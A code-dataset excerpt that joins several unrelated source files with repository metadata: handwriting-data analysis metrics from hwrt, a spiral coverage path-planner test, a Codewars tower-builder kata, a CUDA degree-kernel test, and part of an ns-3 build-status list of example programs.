] | 35 | 2015-01-05T11:56:30.000Z | 2022-03-12T00:55:38.000Z | hwrt/data_analyzation_metrics.py | MartinThoma/hwrt | 7b274fa3022292bb1215eaec99f1826f64f98a07 | [
"MIT"
] | 18 | 2015-01-19T15:57:25.000Z | 2021-02-15T20:38:32.000Z | """Data analyzation metrics
Each algorithm works on a set of handwritings. They have to be applied like
this:
>>> import hwrt.data_analyzation_metrics
>>> from hwrt.handwritten_data import HandwrittenData
>>> data_json = '[[{"time": 123, "x": 45, "y": 67}]]'
>>> a = [{'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=2953, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "2953L"},
... {'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=4037, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "4037L"},
... {'is_in_testset': 0,
... 'formula_id': "31L",
... 'handwriting': HandwrittenData(raw_data_id=4056, raw_data_json=data_json),
... 'formula_in_latex': 'A',
... 'id': "4056L"}]
>>> creator_metric = Creator('creator.csv')
>>> creator_metric(a)
100%
"""
# Core Library modules
import logging
import math
import os
import sys
import time
from collections import defaultdict
# Third party modules
import numpy
# Local modules
# HandwrittenData and preprocessing are needed because of pickle
from . import handwritten_data # pylint: disable=W0611
from . import preprocessing # pylint: disable=W0611
from . import utils
logger = logging.getLogger(__name__)
sys.modules["hwrt.HandwrittenData"] = handwritten_data
def get_metrics(metrics_description):
"""Get metrics from a list of dictionaries. """
return utils.get_objectlist(
metrics_description,
config_key="data_analyzation_plugins",
module=sys.modules[__name__],
)
# Helper functions that are useful for some metrics
def prepare_file(filename):
"""Truncate the file and return the filename."""
directory = os.path.join(utils.get_project_root(), "analyzation/")
if not os.path.exists(directory):
os.makedirs(directory)
workfilename = os.path.join(directory, filename)
with open(workfilename, "w") as fp:
pass # Truncate the file
return workfilename
def sort_by_formula_id(raw_datasets):
"""
Sort a list of formulas by `id`, where `id` represents the accepted
formula id.
Parameters
----------
raw_datasets : list of dictionaries
A list of raw datasets.
Examples
--------
The parameter `raw_datasets` has to be of the format
>>> from hwrt.handwritten_data import HandwrittenData
>>> data = '[[{"time": 123, "x": 45, "y": 67}]]'
>>> rd = [{'is_in_testset': 0,
... 'formula_id': 31,
... 'handwriting': HandwrittenData(raw_data_id=2953, raw_data_json=data),
... 'formula_in_latex': 'A',
... 'id': 2953},
... {'is_in_testset': 0,
... 'formula_id': 31,
... 'handwriting': HandwrittenData(raw_data_id=4037, raw_data_json=data),
... 'formula_in_latex': 'A',
... 'id': 4037},
... {'is_in_testset': 0,
... 'formula_id': 31,
... 'handwriting': HandwrittenData(raw_data_id=4056, raw_data_json=data),
... 'formula_in_latex': 'A',
... 'id': 4056}]
>>> _ = sort_by_formula_id(rd)
"""
by_formula_id = defaultdict(list)
for el in raw_datasets:
by_formula_id[el["handwriting"].formula_id].append(el["handwriting"])
return by_formula_id
# Only data analyzation calculation classes follow
# Every class must have a __str__, __repr__ and __call__ function where
# __call__ must take exactly one argument of type list of dictionaries
# Every class must have a constructor which takes the filename as a parameter.
# This filename has to be used to write the evaluation results
# (preferably in CSV format) to this file.
# prepare_file should be applied to every file in the constructor
class Creator:
"""Analyze who created most of the data."""
def __init__(self, filename="creator.csv"):
self.filename = prepare_file(filename)
def __repr__(self):
return "AnalyzeCreator(%s)" % self.filename
def __str__(self):
return "AnalyzeCreator(%s)" % self.filename
def __call__(self, raw_datasets):
with open(self.filename, "a") as write_file:
write_file.write("creatorid,nr of recordings\n") # heading
print_data = defaultdict(int)
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
print_data[raw_dataset["handwriting"].user_id] += 1
print("100%")
# Sort the data by highest value, descending
print_data = sorted(print_data.items(), key=lambda n: n[1], reverse=True)
# Write data to file
write_file.write(f"total,{sum(value for _, value in print_data)}\n")
for userid, value in print_data:
write_file.write(f"{userid},{value}\n")
class InstrokeSpeed:
"""Analyze how fast the points were in pixel/ms."""
def __init__(self, filename="instroke_speed.csv"):
self.filename = prepare_file(filename)
def __repr__(self):
return "InstrokeSpeed(%s)" % self.filename
def __str__(self):
return "InstrokeSpeed(%s)" % self.filename
def __call__(self, raw_datasets):
with open(self.filename, "a") as write_file:
write_file.write("speed\n") # heading
print_data = []
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
pointlist = raw_dataset["handwriting"].get_sorted_pointlist()
for stroke in pointlist:
for last_point, point in zip(stroke, stroke[1:]):
space_dist = math.hypot(
last_point["x"] - point["x"], last_point["y"] - point["y"]
)
time_delta = point["time"] - last_point["time"]
if time_delta == 0:
continue
print_data.append(space_dist / time_delta)
print("100%")
# Sort the data by highest value, descending
print_data = sorted(print_data, reverse=True)
# Write data to file
for value in print_data:
write_file.write("%0.8f\n" % (value))
logger.info("instroke speed mean: %0.8f", numpy.mean(print_data))
logger.info("instroke speed std: %0.8f", numpy.std(print_data))
class InterStrokeDistance:
"""Analyze how much distance in px is between strokes."""
def __init__(self, filename="dist_between_strokes.csv"):
self.filename = prepare_file(filename)
def __repr__(self):
return "InterStrokeDistance(%s)" % self.filename
def __str__(self):
return "InterStrokeDistance(%s)" % self.filename
def __call__(self, raw_datasets):
with open(self.filename, "a") as write_file:
write_file.write("speed\n") # heading
print_data = []
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
pointlist = raw_dataset["handwriting"].get_sorted_pointlist()
for last_stroke, stroke in zip(pointlist, pointlist[1:]):
point1 = last_stroke[-1]
point2 = stroke[0]
space_dist = math.hypot(
point1["x"] - point2["x"], point1["y"] - point2["y"]
)
print_data.append(space_dist)
print("100%")
# Sort the data by highest value, descending
print_data = sorted(print_data, reverse=True)
# Write data to file
for value in print_data:
write_file.write("%0.8f\n" % (value))
logger.info("dist_between_strokes mean:\t%0.8fpx", numpy.mean(print_data))
logger.info("dist_between_strokes std: \t%0.8fpx", numpy.std(print_data))
class TimeBetweenPointsAndStrokes:
"""For each recording: Store the average time between controll points of
one stroke / controll points of two different strokes.
"""
def __init__(
self,
filename="average_time_between_points.txt",
filename_strokes="average_time_between_strokes.txt",
):
self.filename_points = prepare_file(filename)
self.filename_strokes = prepare_file(filename_strokes)
def __repr__(self):
return "TimeBetweenPointsAndStrokes({points}, {strokes})".format(
points=self.filename_points,
strokes=self.filename_strokes,
)
__str__ = __repr__
def __call__(self, raw_datasets):
average_between_points = open(self.filename_points, "a") # noqa
average_between_strokes = open(self.filename_strokes, "a") # noqa
start_time = time.time()
for i, raw_dataset in enumerate(raw_datasets):
if i % 100 == 0 and i > 0:
utils.print_status(len(raw_datasets), i, start_time)
# Do the work
times_between_points, times_between_strokes = [], []
last_stroke_end = None
for stroke in raw_dataset["handwriting"].get_sorted_pointlist():
if last_stroke_end is not None:
times_between_strokes.append(stroke[-1]["time"] - last_stroke_end)
last_stroke_end = stroke[-1]["time"]
for point1, point2 in zip(stroke, stroke[1:]):
delta = point2["time"] - point1["time"]
times_between_points.append(delta)
# The recording might only have one point
if len(times_between_points) > 0:
tmp = times_between_points
average_between_points.write("%0.2f\n" % numpy.average(tmp))
# The recording might only have one stroke
if len(times_between_strokes) > 0:
tmp = times_between_strokes
average_between_strokes.write("%0.2f\n" % numpy.average(tmp))
print("100%")
average_between_points.close()
average_between_strokes.close()
class AnalyzeErrors:
"""Analyze the number of errors in the dataset."""
def __init__(self, filename="errors.txt", time_max_threshold=30 * 1000):
self.filename = prepare_file(filename)
self.time_max_threshold = time_max_threshold # in ms
self.dot_symbols = [
"i",
"j",
r"\cdot",
r"\div",
"\\because",
"\\therefore",
] # TODO: Use the tags!
def __repr__(self):
return "AnalyzeErrors"
def __str__(self):
return "AnalyzeErrors"
def _write_data(
self,
symbols,
err_recs,
nr_recordings,
total_error_count,
percentages,
time_max_list,
):
"""Write all obtained data to a file.
Parameters
----------
symbols : list of tuples (String, non-negative int)
List of all symbols with the count of recordings
err_recs : dictionary
count of recordings by error type
nr_recordings : non-negative int
number of recordings
total_error_count : dictionary
Count of all error that have happened by type
percentages : list
List of all recordings where removing the dots changed the size of
the bounding box.
time_max_list : list
List of all recordings where the recording time is above a
threshold.
"""
write_file = open(self.filename, "a") # noqa
s = ""
for symbol, count in sorted(symbols.items(), key=lambda n: n[0]):
if symbol in ["a", "0", "A"]:
s += "\n%s (%i), " % (symbol, count)
elif symbol in ["z", "9", "Z"]:
s += "%s (%i) \n" % (symbol, count)
else:
s += "%s (%i), " % (symbol, count)
print("## Data", file=write_file)
print("Symbols: %i" % len(symbols), file=write_file)
print("Recordings: %i" % sum(symbols.values()), file=write_file)
print("```", file=write_file)
print(s[:-1], file=write_file)
print("```", file=write_file)
# Show errors
print(
"Recordings with wild points: %i (%0.2f%%)"
% (
err_recs["wild_points"],
float(err_recs["wild_points"]) / nr_recordings * 100,
),
file=write_file,
)
print("wild points: %i" % total_error_count["wild_points"], file=write_file)
print(
"Recordings with missing stroke: %i (%0.2f%%)"
% (
err_recs["missing_stroke"],
float(err_recs["missing_stroke"]) / nr_recordings * 100,
),
file=write_file,
)
print(
"Recordings with errors: %i (%0.2f%%)"
% (err_recs["total"], float(err_recs["total"]) / nr_recordings * 100),
file=write_file,
)
print(
"Recordings with dots: %i (%0.2f%%)"
% (
err_recs["single_dots"],
float(err_recs["single_dots"]) / nr_recordings * 100,
),
file=write_file,
)
print("dots: %i" % total_error_count["single_dots"], file=write_file)
print(
"size changing removal: %i (%0.2f%%)"
% (len(percentages), float(len(percentages)) / nr_recordings * 100),
file=write_file,
)
print(
"%i recordings took more than %i ms. That were: "
% (len(time_max_list), self.time_max_threshold),
file=write_file,
)
for recording in time_max_list:
print(
"* %ims: %s: %s"
% (
recording.get_time(),
utils.get_readable_time(recording.get_time()),
recording,
),
file=write_file,
)
write_file.close()
def __call__(self, raw_datasets):
# Initialize variables
symbols = defaultdict(int)
# Count errornous recordings
err_recs = {
"wild_points": 0,
"missing_stroke": 0,
"single_dots": 0, # except symbols_with_dots
"total": 0,
}
# Count errors (one type of error might occur multiple times in
# a single recording)
total_error_count = {"wild_points": 0, "single_dots": 0}
percentages = []
# List with recordings that are over the time maximum
time_max_list = []
for raw_dataset in raw_datasets:
recording = raw_dataset["handwriting"]
symbols[recording.formula_in_latex] += 1
if recording.get_time() > self.time_max_threshold:
time_max_list.append(recording)
if recording.wild_point_count > 0:
err_recs["wild_points"] += 1
total_error_count["wild_points"] += recording.wild_point_count
err_recs["missing_stroke"] += recording.missing_stroke
if recording.wild_point_count > 0 or recording.missing_stroke:
err_recs["total"] += 1
if (
recording.count_single_dots() > 0
and raw_dataset["formula_in_latex"] not in self.dot_symbols
and "dots" not in raw_dataset["formula_in_latex"]
):
err_recs["single_dots"] += 1
old_area = recording.get_area()
tmp = [preprocessing.RemoveDots()]
recording.preprocessing(tmp)
new_area = recording.get_area()
percentage = float(new_area) / float(old_area)
if percentage < 1.0:
percentages.append(percentage)
total_error_count["single_dots"] += recording.count_single_dots()
time_max_list = sorted(time_max_list, key=lambda n: n.get_time(), reverse=True)
self._write_data(
symbols,
err_recs,
len(raw_datasets),
total_error_count,
percentages,
time_max_list,
)
| 35.613248 | 87 | 0.574789 | 12,845 | 0.770685 | 0 | 0 | 0 | 0 | 0 | 0 | 6,069 | 0.364133 |
44170fa4cc3dbe32cd38f39ba8ff73bae2cde9dc | 1,609 | py | Python | tests/test_spiral_spanning_tree_coverage_path_planner.py | duken72/PythonRobotics | 177f04618c4bbba40bea38cd57d642f7ab9e3725 | [
"MIT"
] | 15,431 | 2016-10-07T08:25:10.000Z | 2022-03-31T22:06:02.000Z | tests/test_spiral_spanning_tree_coverage_path_planner.py | duken72/PythonRobotics | 177f04618c4bbba40bea38cd57d642f7ab9e3725 | [
"MIT"
] | 486 | 2017-05-01T00:40:00.000Z | 2022-03-23T06:57:42.000Z | tests/test_spiral_spanning_tree_coverage_path_planner.py | duken72/PythonRobotics | 177f04618c4bbba40bea38cd57d642f7ab9e3725 | [
"MIT"
] | 4,978 | 2017-03-05T22:23:36.000Z | 2022-03-31T12:42:17.000Z | import conftest # Add root path to sys.path
import os
import matplotlib.pyplot as plt
from PathPlanning.SpiralSpanningTreeCPP \
import spiral_spanning_tree_coverage_path_planner
spiral_spanning_tree_coverage_path_planner.do_animation = True
def spiral_stc_cpp(img, start):
num_free = 0
for i in range(img.shape[0]):
for j in range(img.shape[1]):
num_free += img[i][j]
STC_planner = spiral_spanning_tree_coverage_path_planner.\
SpiralSpanningTreeCoveragePlanner(img)
edge, route, path = STC_planner.plan(start)
covered_nodes = set()
for p, q in edge:
covered_nodes.add(p)
covered_nodes.add(q)
# assert complete coverage
assert len(covered_nodes) == num_free / 4
def test_spiral_stc_cpp_1():
img_dir = os.path.dirname(
os.path.abspath(__file__)) + \
"/../PathPlanning/SpiralSpanningTreeCPP"
img = plt.imread(os.path.join(img_dir, 'map', 'test.png'))
start = (0, 0)
spiral_stc_cpp(img, start)
def test_spiral_stc_cpp_2():
img_dir = os.path.dirname(
os.path.abspath(__file__)) + \
"/../PathPlanning/SpiralSpanningTreeCPP"
img = plt.imread(os.path.join(img_dir, 'map', 'test_2.png'))
start = (10, 0)
spiral_stc_cpp(img, start)
def test_spiral_stc_cpp_3():
img_dir = os.path.dirname(
os.path.abspath(__file__)) + \
"/../PathPlanning/SpiralSpanningTreeCPP"
img = plt.imread(os.path.join(img_dir, 'map', 'test_3.png'))
start = (0, 0)
spiral_stc_cpp(img, start)
if __name__ == '__main__':
conftest.run_this_test(__file__)
| 27.271186 | 64 | 0.674332 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 232 | 0.144189 |
441aa57a53a22851224b5613923ac3dbb66e492a | 320 | py | Python | codewars-python/Build-Tower.py | fmelihh/competitive-programming-solutions | c15c2f7d90153f35f9bd9ffcea20ac921564eacf | [
"MIT"
] | 2 | 2021-09-06T22:13:12.000Z | 2021-11-22T08:50:04.000Z | codewars-python/Build-Tower.py | fmelihh/competitive-programming-solutions | c15c2f7d90153f35f9bd9ffcea20ac921564eacf | [
"MIT"
] | null | null | null | codewars-python/Build-Tower.py | fmelihh/competitive-programming-solutions | c15c2f7d90153f35f9bd9ffcea20ac921564eacf | [
"MIT"
] | null | null | null |
# https://www.codewars.com/kata/576757b1df89ecf5bd00073b/train/python
def tower_builder(n_floors):
times = 1
space = ((2*n_floors -1) // 2)
tower = []
for _ in range(n_floors):
tower.append((' '*space) + ('*' * times) + (' '*space))
times += 2
space -= 1
return tower
| 16.842105 | 69 | 0.553125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.24375 |
441af981b78ee749fe1c18e5c8769744f42b1cf0 | 1,745 | py | Python | test/test_degrees_kernel.py | remenska/KM3Net | 4c175662465b9a880fc1864f62219ce9702311f1 | [
"Apache-2.0"
] | 1 | 2022-01-23T23:54:08.000Z | 2022-01-23T23:54:08.000Z | test/test_degrees_kernel.py | nlesc-km3net/KM3NeT | 4c175662465b9a880fc1864f62219ce9702311f1 | [
"Apache-2.0"
] | 2 | 2016-07-01T12:19:15.000Z | 2016-07-04T09:01:51.000Z | test/test_degrees_kernel.py | nlesc-km3net/KM3NeT | 4c175662465b9a880fc1864f62219ce9702311f1 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import numpy as np
from kernel_tuner import run_kernel
from .context import skip_if_no_cuda_device, create_plot
from km3net.util import get_kernel_path, generate_correlations_table
def test_degrees_kernel():
skip_if_no_cuda_device()
def in_degrees(correlations):
degrees = np.zeros(correlations.shape[1])
for i in range(correlations.shape[1]):
in_degree = 0
for j in range(correlations.shape[0]):
col = i-j-1
if col>=0:
in_degree += correlations[j, col]
degrees[i] = in_degree
return degrees
with open(get_kernel_path()+'degrees.cu', 'r') as f:
kernel_string = f.read()
N = np.int32(400)
sliding_window_width = np.int32(150)
problem_size = (N, 1)
#generate input data with an expected density of correlated hits
correlations = generate_correlations_table(N, sliding_window_width, cutoff=2.87)
#compute reference answer
in_degree = in_degrees(correlations)
out_degree = np.sum(correlations, axis=0).astype(np.int32)
reference = (in_degree+out_degree)
#call the CUDA kernel
args = [out_degree, correlations, N]
params = { "block_size_x": 256, 'window_width': sliding_window_width }
answer = run_kernel("degrees_dense", kernel_string, problem_size, args, params)
print("answer", answer[0])
print("reference", reference)
#verify
test_result = np.sum(answer[0] - reference) == 0
if not test_result == True:
print("test degrees_dense FAILED, attempting to create a plot for visual comparison")
create_plot(reference.reshape(20,20), answer[0].reshape(20,20))
assert test_result
| 32.924528 | 93 | 0.67851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 272 | 0.155874 |
441cc1fcbf285eb769a00c3f77129f03547305f0 | 12,718 | py | Python | ns-allinone-3.27/ns-3.27/build/build-status.py | zack-braun/4607_NS | 43c8fb772e5552fb44bd7cd34173e73e3fb66537 | [
"MIT"
] | null | null | null | ns-allinone-3.27/ns-3.27/build/build-status.py | zack-braun/4607_NS | 43c8fb772e5552fb44bd7cd34173e73e3fb66537 | [
"MIT"
] | null | null | null | ns-allinone-3.27/ns-3.27/build/build-status.py | zack-braun/4607_NS | 43c8fb772e5552fb44bd7cd34173e73e3fb66537 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# Programs that are runnable.
ns3_runnable_programs = ['build/src/aodv/examples/ns3.27-aodv-debug', 'build/src/bridge/examples/ns3.27-csma-bridge-debug', 'build/src/bridge/examples/ns3.27-csma-bridge-one-hop-debug', 'build/src/buildings/examples/ns3.27-buildings-pathloss-profiler-debug', 'build/src/config-store/examples/ns3.27-config-store-save-debug', 'build/src/core/examples/ns3.27-main-callback-debug', 'build/src/core/examples/ns3.27-sample-simulator-debug', 'build/src/core/examples/ns3.27-main-ptr-debug', 'build/src/core/examples/ns3.27-main-random-variable-debug', 'build/src/core/examples/ns3.27-main-random-variable-stream-debug', 'build/src/core/examples/ns3.27-sample-random-variable-debug', 'build/src/core/examples/ns3.27-sample-random-variable-stream-debug', 'build/src/core/examples/ns3.27-command-line-example-debug', 'build/src/core/examples/ns3.27-hash-example-debug', 'build/src/core/examples/ns3.27-sample-log-time-format-debug', 'build/src/core/examples/ns3.27-test-string-value-formatting-debug', 'build/src/csma/examples/ns3.27-csma-one-subnet-debug', 'build/src/csma/examples/ns3.27-csma-broadcast-debug', 'build/src/csma/examples/ns3.27-csma-packet-socket-debug', 'build/src/csma/examples/ns3.27-csma-multicast-debug', 'build/src/csma/examples/ns3.27-csma-raw-ip-socket-debug', 'build/src/csma/examples/ns3.27-csma-ping-debug', 'build/src/csma-layout/examples/ns3.27-csma-star-debug', 'build/src/dsdv/examples/ns3.27-dsdv-manet-debug', 'build/src/dsr/examples/ns3.27-dsr-debug', 'build/src/energy/examples/ns3.27-li-ion-energy-source-debug', 'build/src/energy/examples/ns3.27-rv-battery-model-test-debug', 'build/src/energy/examples/ns3.27-basic-energy-model-test-debug', 'build/src/fd-net-device/examples/ns3.27-dummy-network-debug', 'build/src/fd-net-device/examples/ns3.27-fd2fd-onoff-debug', 'build/src/internet/examples/ns3.27-main-simple-debug', 'build/src/internet-apps/examples/ns3.27-dhcp-example-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-packet-print-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-phy-test-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-data-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-error-model-plot-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-error-distance-plot-debug', 'build/src/lte/examples/ns3.27-lena-cqi-threshold-debug', 'build/src/lte/examples/ns3.27-lena-dual-stripe-debug', 'build/src/lte/examples/ns3.27-lena-fading-debug', 'build/src/lte/examples/ns3.27-lena-intercell-interference-debug', 'build/src/lte/examples/ns3.27-lena-pathloss-traces-debug', 'build/src/lte/examples/ns3.27-lena-profiling-debug', 'build/src/lte/examples/ns3.27-lena-rem-debug', 'build/src/lte/examples/ns3.27-lena-rem-sector-antenna-debug', 'build/src/lte/examples/ns3.27-lena-rlc-traces-debug', 'build/src/lte/examples/ns3.27-lena-simple-debug', 'build/src/lte/examples/ns3.27-lena-simple-epc-debug', 'build/src/lte/examples/ns3.27-lena-deactivate-bearer-debug', 'build/src/lte/examples/ns3.27-lena-x2-handover-debug', 'build/src/lte/examples/ns3.27-lena-x2-handover-measures-debug', 'build/src/lte/examples/ns3.27-lena-frequency-reuse-debug', 'build/src/lte/examples/ns3.27-lena-distributed-ffr-debug', 'build/src/lte/examples/ns3.27-lena-uplink-power-control-debug', 'build/src/mesh/examples/ns3.27-mesh-debug', 'build/src/mobility/examples/ns3.27-main-grid-topology-debug', 'build/src/mobility/examples/ns3.27-main-random-topology-debug', 'build/src/mobility/examples/ns3.27-main-random-walk-debug', 'build/src/mobility/examples/ns3.27-mobility-trace-example-debug', 'build/src/mobility/examples/ns3.27-ns2-mobility-trace-debug', 'build/src/mobility/examples/ns3.27-bonnmotion-ns2-example-debug', 'build/src/mpi/examples/ns3.27-simple-distributed-debug', 'build/src/mpi/examples/ns3.27-third-distributed-debug', 'build/src/mpi/examples/ns3.27-nms-p2p-nix-distributed-debug', 'build/src/mpi/examples/ns3.27-simple-distributed-empty-node-debug', 'build/src/netanim/examples/ns3.27-dumbbell-animation-debug', 'build/src/netanim/examples/ns3.27-grid-animation-debug', 'build/src/netanim/examples/ns3.27-star-animation-debug', 'build/src/netanim/examples/ns3.27-wireless-animation-debug', 'build/src/netanim/examples/ns3.27-uan-animation-debug', 'build/src/netanim/examples/ns3.27-colors-link-description-debug', 'build/src/netanim/examples/ns3.27-resources-counters-debug', 'build/src/network/examples/ns3.27-main-packet-header-debug', 'build/src/network/examples/ns3.27-main-packet-tag-debug', 'build/src/network/examples/ns3.27-packet-socket-apps-debug', 'build/src/nix-vector-routing/examples/ns3.27-nix-simple-debug', 'build/src/nix-vector-routing/examples/ns3.27-nms-p2p-nix-debug', 'build/src/olsr/examples/ns3.27-simple-point-to-point-olsr-debug', 'build/src/olsr/examples/ns3.27-olsr-hna-debug', 'build/src/point-to-point/examples/ns3.27-main-attribute-value-debug', 'build/src/propagation/examples/ns3.27-main-propagation-loss-debug', 'build/src/propagation/examples/ns3.27-jakes-propagation-model-example-debug', 'build/src/sixlowpan/examples/ns3.27-example-sixlowpan-debug', 'build/src/sixlowpan/examples/ns3.27-example-ping-lr-wpan-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-matrix-propagation-loss-model-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-with-microwave-oven-debug', 'build/src/spectrum/examples/ns3.27-tv-trans-example-debug', 'build/src/spectrum/examples/ns3.27-tv-trans-regional-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-example-debug', 'build/src/stats/examples/ns3.27-double-probe-example-debug', 'build/src/stats/examples/ns3.27-time-probe-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-aggregator-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-helper-example-debug', 'build/src/stats/examples/ns3.27-file-aggregator-example-debug', 'build/src/stats/examples/ns3.27-file-helper-example-debug', 'build/src/topology-read/examples/ns3.27-topology-example-sim-debug', 'build/src/traffic-control/examples/ns3.27-red-tests-debug', 'build/src/traffic-control/examples/ns3.27-red-vs-ared-debug', 'build/src/traffic-control/examples/ns3.27-adaptive-red-tests-debug', 'build/src/traffic-control/examples/ns3.27-pfifo-vs-red-debug', 'build/src/traffic-control/examples/ns3.27-codel-vs-pfifo-basic-test-debug', 'build/src/traffic-control/examples/ns3.27-codel-vs-pfifo-asymmetric-debug', 'build/src/traffic-control/examples/ns3.27-pie-example-debug', 'build/src/uan/examples/ns3.27-uan-cw-example-debug', 'build/src/uan/examples/ns3.27-uan-rc-example-debug', 'build/src/virtual-net-device/examples/ns3.27-virtual-net-device-debug', 'build/src/wave/examples/ns3.27-wave-simple-80211p-debug', 'build/src/wave/examples/ns3.27-wave-simple-device-debug', 'build/src/wave/examples/ns3.27-vanet-routing-compare-debug', 'build/src/wifi/examples/ns3.27-wifi-phy-test-debug', 'build/src/wifi/examples/ns3.27-test-interference-helper-debug', 'build/src/wifi/examples/ns3.27-wifi-manager-example-debug', 'build/src/wimax/examples/ns3.27-wimax-ipv4-debug', 'build/src/wimax/examples/ns3.27-wimax-multicast-debug', 'build/src/wimax/examples/ns3.27-wimax-simple-debug', 'build/examples/energy/ns3.27-energy-model-example-debug', 'build/examples/energy/ns3.27-energy-model-with-harvesting-example-debug', 'build/examples/error-model/ns3.27-simple-error-model-debug', 'build/examples/ipv6/ns3.27-icmpv6-redirect-debug', 'build/examples/ipv6/ns3.27-ping6-debug', 'build/examples/ipv6/ns3.27-radvd-debug', 'build/examples/ipv6/ns3.27-radvd-two-prefix-debug', 'build/examples/ipv6/ns3.27-test-ipv6-debug', 'build/examples/ipv6/ns3.27-fragmentation-ipv6-debug', 'build/examples/ipv6/ns3.27-fragmentation-ipv6-two-MTU-debug', 'build/examples/ipv6/ns3.27-loose-routing-ipv6-debug', 'build/examples/ipv6/ns3.27-wsn-ping6-debug', 'build/examples/matrix-topology/ns3.27-matrix-topology-debug', 'build/examples/naming/ns3.27-object-names-debug', 'build/examples/routing/ns3.27-dynamic-global-routing-debug', 'build/examples/routing/ns3.27-static-routing-slash32-debug', 'build/examples/routing/ns3.27-global-routing-slash32-debug', 'build/examples/routing/ns3.27-global-injection-slash32-debug', 'build/examples/routing/ns3.27-simple-global-routing-debug', 'build/examples/routing/ns3.27-simple-alternate-routing-debug', 'build/examples/routing/ns3.27-mixed-global-routing-debug', 'build/examples/routing/ns3.27-simple-routing-ping6-debug', 'build/examples/routing/ns3.27-manet-routing-compare-debug', 'build/examples/routing/ns3.27-ripng-simple-network-debug', 'build/examples/routing/ns3.27-rip-simple-network-debug', 'build/examples/routing/ns3.27-global-routing-multi-switch-plus-router-debug', 'build/examples/socket/ns3.27-socket-bound-static-routing-debug', 'build/examples/socket/ns3.27-socket-bound-tcp-static-routing-debug', 'build/examples/socket/ns3.27-socket-options-ipv4-debug', 'build/examples/socket/ns3.27-socket-options-ipv6-debug', 'build/examples/stats/ns3.27-wifi-example-sim-debug', 'build/examples/tcp/ns3.27-tcp-large-transfer-debug', 'build/examples/tcp/ns3.27-tcp-nsc-lfn-debug', 'build/examples/tcp/ns3.27-tcp-nsc-zoo-debug', 'build/examples/tcp/ns3.27-tcp-star-server-debug', 'build/examples/tcp/ns3.27-star-debug', 'build/examples/tcp/ns3.27-tcp-bulk-send-debug', 'build/examples/tcp/ns3.27-tcp-pcap-nanosec-example-debug', 'build/examples/tcp/ns3.27-tcp-nsc-comparison-debug', 'build/examples/tcp/ns3.27-tcp-variants-comparison-debug', 'build/examples/traffic-control/ns3.27-traffic-control-debug', 'build/examples/traffic-control/ns3.27-queue-discs-benchmark-debug', 'build/examples/traffic-control/ns3.27-red-vs-fengadaptive-debug', 'build/examples/traffic-control/ns3.27-red-vs-nlred-debug', 'build/examples/tutorial/ns3.27-hello-simulator-debug', 'build/examples/tutorial/ns3.27-first-debug', 'build/examples/tutorial/ns3.27-second-debug', 'build/examples/tutorial/ns3.27-third-debug', 'build/examples/tutorial/ns3.27-fourth-debug', 'build/examples/tutorial/ns3.27-fifth-debug', 'build/examples/tutorial/ns3.27-sixth-debug', 'build/examples/tutorial/ns3.27-seventh-debug', 'build/examples/udp/ns3.27-udp-echo-debug', 'build/examples/udp-client-server/ns3.27-udp-client-server-debug', 'build/examples/udp-client-server/ns3.27-udp-trace-client-server-debug', 'build/examples/wireless/ns3.27-mixed-wired-wireless-debug', 'build/examples/wireless/ns3.27-wifi-adhoc-debug', 'build/examples/wireless/ns3.27-wifi-clear-channel-cmu-debug', 'build/examples/wireless/ns3.27-wifi-ap-debug', 'build/examples/wireless/ns3.27-wifi-wired-bridging-debug', 'build/examples/wireless/ns3.27-multirate-debug', 'build/examples/wireless/ns3.27-wifi-simple-adhoc-debug', 'build/examples/wireless/ns3.27-wifi-simple-adhoc-grid-debug', 'build/examples/wireless/ns3.27-wifi-simple-infra-debug', 'build/examples/wireless/ns3.27-wifi-simple-interference-debug', 'build/examples/wireless/ns3.27-wifi-blockack-debug', 'build/examples/wireless/ns3.27-ofdm-validation-debug', 'build/examples/wireless/ns3.27-ofdm-ht-validation-debug', 'build/examples/wireless/ns3.27-ofdm-vht-validation-debug', 'build/examples/wireless/ns3.27-wifi-hidden-terminal-debug', 'build/examples/wireless/ns3.27-ht-wifi-network-debug', 'build/examples/wireless/ns3.27-vht-wifi-network-debug', 'build/examples/wireless/ns3.27-wifi-timing-attributes-debug', 'build/examples/wireless/ns3.27-wifi-sleep-debug', 'build/examples/wireless/ns3.27-power-adaptation-distance-debug', 'build/examples/wireless/ns3.27-power-adaptation-interference-debug', 'build/examples/wireless/ns3.27-rate-adaptation-distance-debug', 'build/examples/wireless/ns3.27-wifi-aggregation-debug', 'build/examples/wireless/ns3.27-simple-ht-hidden-stations-debug', 'build/examples/wireless/ns3.27-80211n-mimo-debug', 'build/examples/wireless/ns3.27-mixed-network-debug', 'build/examples/wireless/ns3.27-wifi-tcp-debug', 'build/examples/wireless/ns3.27-80211e-txop-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-per-example-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-per-interference-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-saturation-example-debug', 